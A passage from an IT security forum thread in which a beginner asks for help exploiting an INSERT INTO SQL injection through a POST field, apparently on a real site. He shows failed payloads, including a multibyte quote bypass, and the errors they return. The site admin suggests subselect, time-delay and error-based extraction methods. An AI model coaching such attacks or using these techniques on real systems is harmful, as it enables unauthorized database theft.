Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 23, 2020
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 349
Members: 0
Total: 349
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Need assistance exploiting 'INSERT INTO' post sql injection
Post new topic  Reply to topic View previous topic :: View next topic 
Need assistance exploiting 'INSERT INTO' post sql injection
PostPosted: Tue Jul 05, 2011 12:07 am Reply with quote
BlueScreenOfDoom666
Regular user
Regular user
 
Joined: Jan 06, 2008
Posts: 5
Location: -




INSERT INTO tablename ( field1, field2, field3, exploitable_field, field5 ) VALUES( 'val1', 'val2', 'val3', '??????', 'val5' )


I've been trying to inject a query into "exploitable_field" and grab the contents of tablename, however, whenever I post the query, the server just spits out a "Query failed: errno = 1064, error = You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "<my sql queries> --[rest of variable exploitable_field]" at line <line number>

query= < ... >


I patched the rest of the values in the original query with empty fields, "''" aka "0xbf5c0xbf5c", until the statement was finished, and then added my query followed by a double dash comment.



valid query:
Code:

INSERT INTO site_infotable ( nickname, email, timezone, birthdate, ipaddress ) VALUES ( 'anon', 'abcd@ef.gh', '-12', '1980', '127.0.0.1' )


my code to inject:
Code:

SELECT * FROM site_infotable


my attempt that isn't working (inside the post data):
Code:

&birthdate=0xbf5c0xbf5c, 0xbf5c0xbf5c) AND SELECT * FROM site_infotable --



resulting error:
Code:

Query failed:
errno = 1064
error = You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' AND SELECT * FROM site_infotable --, '127.0.0.1' at line 2

query=INSERT INTO site_infotable ( nickname, email, timezone, birthdate, ipaddress ) VALUES ( 'anon, 'abcd@ef.gh', '-12', 0xbf5c0xbf5c, 0xbf5c0xbf5c) AND SELECT * FROM site_infotable --, '127.0.0.1' )




Note the 0xbf5c are supposed to be single quotes ( ' ), as they were being prefixed with a slash ( \ ) [ magic quotes? ].


I'm not sure what I'm doing wrong. If anyone could help me with this that would be great.
Note that I'm a beginner and this is my first attempt. I've been trying this for hours, and googled and googled and googled more, and failed.
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
PostPosted: Tue Jul 05, 2011 11:41 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




More information is needed.

1. Attack goes through POST request? How do you manipulate POST parameters?
Do you use "Tamper Data", handcrafted html files or other method?

2. Attack vector is POST parameter "birthdate"? Is it suppose to be
integer or string? Do you need single quotes for sql injection or exploitation
is possible without single quotes?

If you can, then let me see the POST request you use.

Anyway, there is mainly two methods for INSERT INTO sql injection exploitation.

1. injection of useful data to the database and then reading it, if possible.
For this you need to use subselects.

2. alternative method is time delay based or error feedback based exploitation.
You can use BENCHMARK() or SLEEP() with subqueries and IF()
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 06, 2011 1:20 pm Reply with quote
BlueScreenOfDoom666
Regular user
Regular user
 
Joined: Jan 06, 2008
Posts: 5
Location: -




I'm using my own C# application to send a POST request.

The post data I'm sending looks like this:
Code:

&nickname=anon&email=abcd@ef.gh&timezone=-12&birthdate=


"&birthdate=" is the string field where the sql injection goes.

Everything I've tried has resulted in a bad syntax error.
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
PostPosted: Wed Jul 06, 2011 1:39 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




BlueScreenOfDoom666 wrote:
I'm using my own C# application to send a POST request.

The post data I'm sending looks like this:
Code:

&nickname=anon&email=abcd@ef.gh&timezone=-12&birthdate=


"&birthdate=" is the string field where the sql injection goes.

Everything I've tried has resulted in a bad syntax error.


I repeat the question - do you need to use single quotes for this exploit?
I mean, if birthdate=foobar, there is sql error?
Or you need to use birthdate=foo'bar ?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 06, 2011 1:44 pm Reply with quote
BlueScreenOfDoom666
Regular user
Regular user
 
Joined: Jan 06, 2008
Posts: 5
Location: -




waraxe wrote:
BlueScreenOfDoom666 wrote:
I'm using my own C# application to send a POST request.

The post data I'm sending looks like this:
Code:

&nickname=anon&email=abcd@ef.gh&timezone=-12&birthdate=


"&birthdate=" is the string field where the sql injection goes.

Everything I've tried has resulted in a bad syntax error.


I repeat the question - do you need to use single quotes for this exploit?
I mean, if birthdate=foobar, there is sql error?
Or you need to use birthdate=foo'bar ?


Oh oops, didn't see that. I've been trying to use the single quotes ( ' ). The server inserts a slash ( \ ) infront of the quote so it becomes a ( \' ), and I tried to bypass that by using 0xbf5c, but it didn't work.
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
PostPosted: Wed Jul 06, 2011 1:48 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




If you try:

Code:

birthdate=1234


do you get sql error message?

And if you try:

Code:

birthdate=abcd


do you see sql error message?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 06, 2011 1:51 pm Reply with quote
BlueScreenOfDoom666
Regular user
Regular user
 
Joined: Jan 06, 2008
Posts: 5
Location: -




waraxe wrote:
If you try:

Code:

birthdate=1234


do you get sql error message?

And if you try:

Code:

birthdate=abcd


do you see sql error message?



Nope, abcd works just fine. The requests goes through without a problem.
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
PostPosted: Wed Jul 06, 2011 1:59 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




OK, then show me the string, that will provoke sql error message.
And let me see that error message.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 06, 2011 2:13 pm Reply with quote
BlueScreenOfDoom666
Regular user
Regular user
 
Joined: Jan 06, 2008
Posts: 5
Location: -




Code:

&nickname=anon&email=abcd@ef.gh&timezone=-12&birthdate=a', '127.0.0.1'); SELECT * from site_infotable --


Code:

Query failed:
errorno=1064
error=You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\', \'127.0.0.1\'); SELECT * from site_infotable --, '127.0.0.1' at line 2
query=INSERT INTO site_infotable ( nickname, email, timezone, birthdate, ipaddress ) VALUES ( 'anon, 'abcd@ef.gh', '-12', a\', '127.0.0.1'); SELECT * FROM site_infotable --, '127.0.0.1')
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
PostPosted: Wed Jul 06, 2011 2:39 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This error message seems to be missing some single quotes ...
Anyway, do you have access to the information from that INSERT query?
I mean - if you INSERT birthdate=blah, then can you open web page, that will show birthdate you just inserted?
If you have such feedback possibility, then you can use it for fetching needed information from target database.
Of course, you must fist know, if birthdate field in database table is numeric or string and how much information can it store.
So let me know, if you can see inserted birthdate or ipaddress after POST query.
View user's profile Send private message Send e-mail Visit poster's website
Need assistance exploiting 'INSERT INTO' post sql injection
  www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.085 Seconds